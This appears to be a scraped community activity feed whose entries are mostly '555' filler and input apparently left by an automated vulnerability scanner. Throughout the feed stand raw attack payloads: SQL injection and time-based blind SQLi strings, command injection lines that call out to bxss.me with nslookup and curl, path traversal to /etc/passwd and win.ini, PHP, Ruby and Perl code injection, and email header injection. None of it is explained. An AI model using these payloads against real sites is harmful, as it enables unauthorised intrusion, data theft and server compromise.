-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
posted an update 2 years, 5 months ago
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
“+”A”.concat(70-3).concat(22*4).concat(113).concat(77).concat(118).concat(73)+(require”socket”
Socket.gethostbyname(“hitnt”+”kbqvuvty72699.bxss.me.”)[3].to_s)+” -
555
-
555
-
555
-
‘+’A’.concat(70-3).concat(22*4).concat(97).concat(69).concat(111).concat(73)+(require’socket’
Socket.gethostbyname(‘hitti’+’rwlbpujn75d49.bxss.me.’)[3].to_s)+’ -
555
-
555
-
bxss.me/t/xss.html?%00
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
index.php
-
555
-
555
bcc:074625.42144-25000.42144.06d59.19518.2@bxss.me -
555
-
index.php
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
index.php/.
-
555
-
555
-
555
-
to@example.com>
bcc:074625.42144-25001.42144.06d59.19518.2@bxss.me -
555
-
555
-
555
-
response.write(9502256*9756891)
-
555
-
555
-
555
-
‘+response.write(9502256*9756891)+’
-
555
-
555
-
555
-
555
-
555
-
“+response.write(9502256*9756891)+”
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
)
-
../../../../../../../../../../../../../../etc/passwd
-
555
-
555
-
555
-
../../../../../../../../../../../../../../windows/win.ini
-
555
-
555
-
555
-
555
-
‘.gethostbyname(lc(‘hitbv’.’bxftisbx574a9.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(97).chr(81).chr(107).chr(89).’
-
!(()&&!|*|*|
-
555
-
555
-
file:///etc/passwd
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
^(#$!@#$)(()))******
-
555
-
555
-
555
-
“.gethostbyname(lc(“hitgq”.”pigtgsfjd16a0.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(119).chr(74).chr(110).chr(89).”
-
555
-
555
-
555
-
555&n989927=v930152
-
555
-
555
-
../555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
echo qvyoxi$()\ bfsrwb\nz^xyu||a #’ &echo qvyoxi$()\ bfsrwb\nz^xyu||a #|” &echo qvyoxi$()\ bfsrwb\nz^xyu||a #
-
555
-
555
-
555
-
555
-
&echo nnstma$()\ svzyrq\nz^xyu||a #’ &echo nnstma$()\ svzyrq\nz^xyu||a #|” &echo nnstma$()\ svzyrq\nz^xyu||a #
-
|echo txpqat$()\ jjpylu\nz^xyu||a #’ |echo txpqat$()\ jjpylu\nz^xyu||a #|” |echo txpqat$()\ jjpylu\nz^xyu||a #
-
555
-
555
-
555
-
555
-
555
-
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
555
-
1DTBnpXtlcO
-
(nslookup -q=cname hitnlhsmwbzjv9b079.bxss.me||curl hitnlhsmwbzjv9b079.bxss.me))
-
555
-
555
-
npPuTxgr
-
‘”
-
$(nslookup -q=cname hitczpqwhbhikc65a3.bxss.me||curl hitczpqwhbhikc65a3.bxss.me)
-
555
-
555
-
<!–
-
555
-
&nslookup -q=cname hitrgzerileej5c971.bxss.me&’\”`0&nslookup -q=cname hitrgzerileej5c971.bxss.me&`’
-
555
-
${9999608+9999354}
-
555
-
&(nslookup -q=cname hitgpylovkfci5533f.bxss.me||curl hitgpylovkfci5533f.bxss.me)&’\”`0&(nslookup -q=cname hitgpylovkfci5533f.bxss.me||curl hitgpylovkfci5533f.bxss.me)&`’
-
555
-
|(nslookup -q=cname hityjraqfntnc3dd1c.bxss.me||curl hityjraqfntnc3dd1c.bxss.me)
-
555
-
555
-
555
-
`(nslookup -q=cname hitqagelxtrqf6fddc.bxss.me||curl hitqagelxtrqf6fddc.bxss.me)`
-
555
-
;(nslookup -q=cname hitgjogsiuwyibefd5.bxss.me||curl hitgjogsiuwyibefd5.bxss.me)|(nslookup -q=cname hitgjogsiuwyibefd5.bxss.me||curl hitgjogsiuwyibefd5.bxss.me)&(nslookup -q=cname hitgjogsiuwyibefd5.bxss.me||curl hitgjogsiuwyibefd5.bxss.me)
-
555
-
555
-
555
-
555
-
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
‘;print(md5(31337));$a=’
-
555
-
555
-
“;print(md5(31337));$a=”
-
xfs.bxss.me
-
555
-
555
-
555
-
${@print(md5(31337))}
-
555
-
${@print(md5(31337))}\
-
555
-
‘.print(md5(31337)).’
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
-
‘”()
-
555’&&sleep(27*1000)*jfeqhj&&’
-
555
-
555″&&sleep(27*1000)*ygehca&&”
-
555’||sleep(27*1000)*agfdho||’
-
555
-
555
-
555″||sleep(27*1000)*edkmdz||”
-
555
-
555
-
/etc/shells
-
c:/windows/win.ini
-
555
-
bxss.me
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555′”()&%Kab9(9454)
-
‘”()&%Kab9(9446)
-
5559639250
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
555
-
-1 OR 2+154-154-1=0+0+0+1 —
-
-1 OR 2+509-509-1=0+0+0+1
-
-1′ OR 2+977-977-1=0+0+0+1 —
-
-1′ OR 2+267-267-1=0+0+0+1 or ‘cil3Gw66’=’
-
-1″ OR 2+501-501-1=0+0+0+1 —
-
if(now()=sysdate(),sleep(15),0)
-
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
-
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-
-1; waitfor delay ‘0:0:15’ —
-
-1); waitfor delay ‘0:0:15’ —
-
1 waitfor delay ‘0:0:15’ —
-
hxfL7mJM’; waitfor delay ‘0:0:15’ —
-
-5 OR 604=(SELECT 604 FROM PG_SLEEP(15))–
-
-5) OR 91=(SELECT 91 FROM PG_SLEEP(15))–
-
-1)) OR 588=(SELECT 588 FROM PG_SLEEP(15))–
-
jOcw9zOk’ OR 759=(SELECT 759 FROM PG_SLEEP(15))–
-
DCvq0Nxe’) OR 661=(SELECT 661 FROM PG_SLEEP(15))–
-
dR9CCnvW’)) OR 689=(SELECT 689 FROM PG_SLEEP(15))–
-
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
-
1′”
-
@@SSfYI
-
555
-
555
-
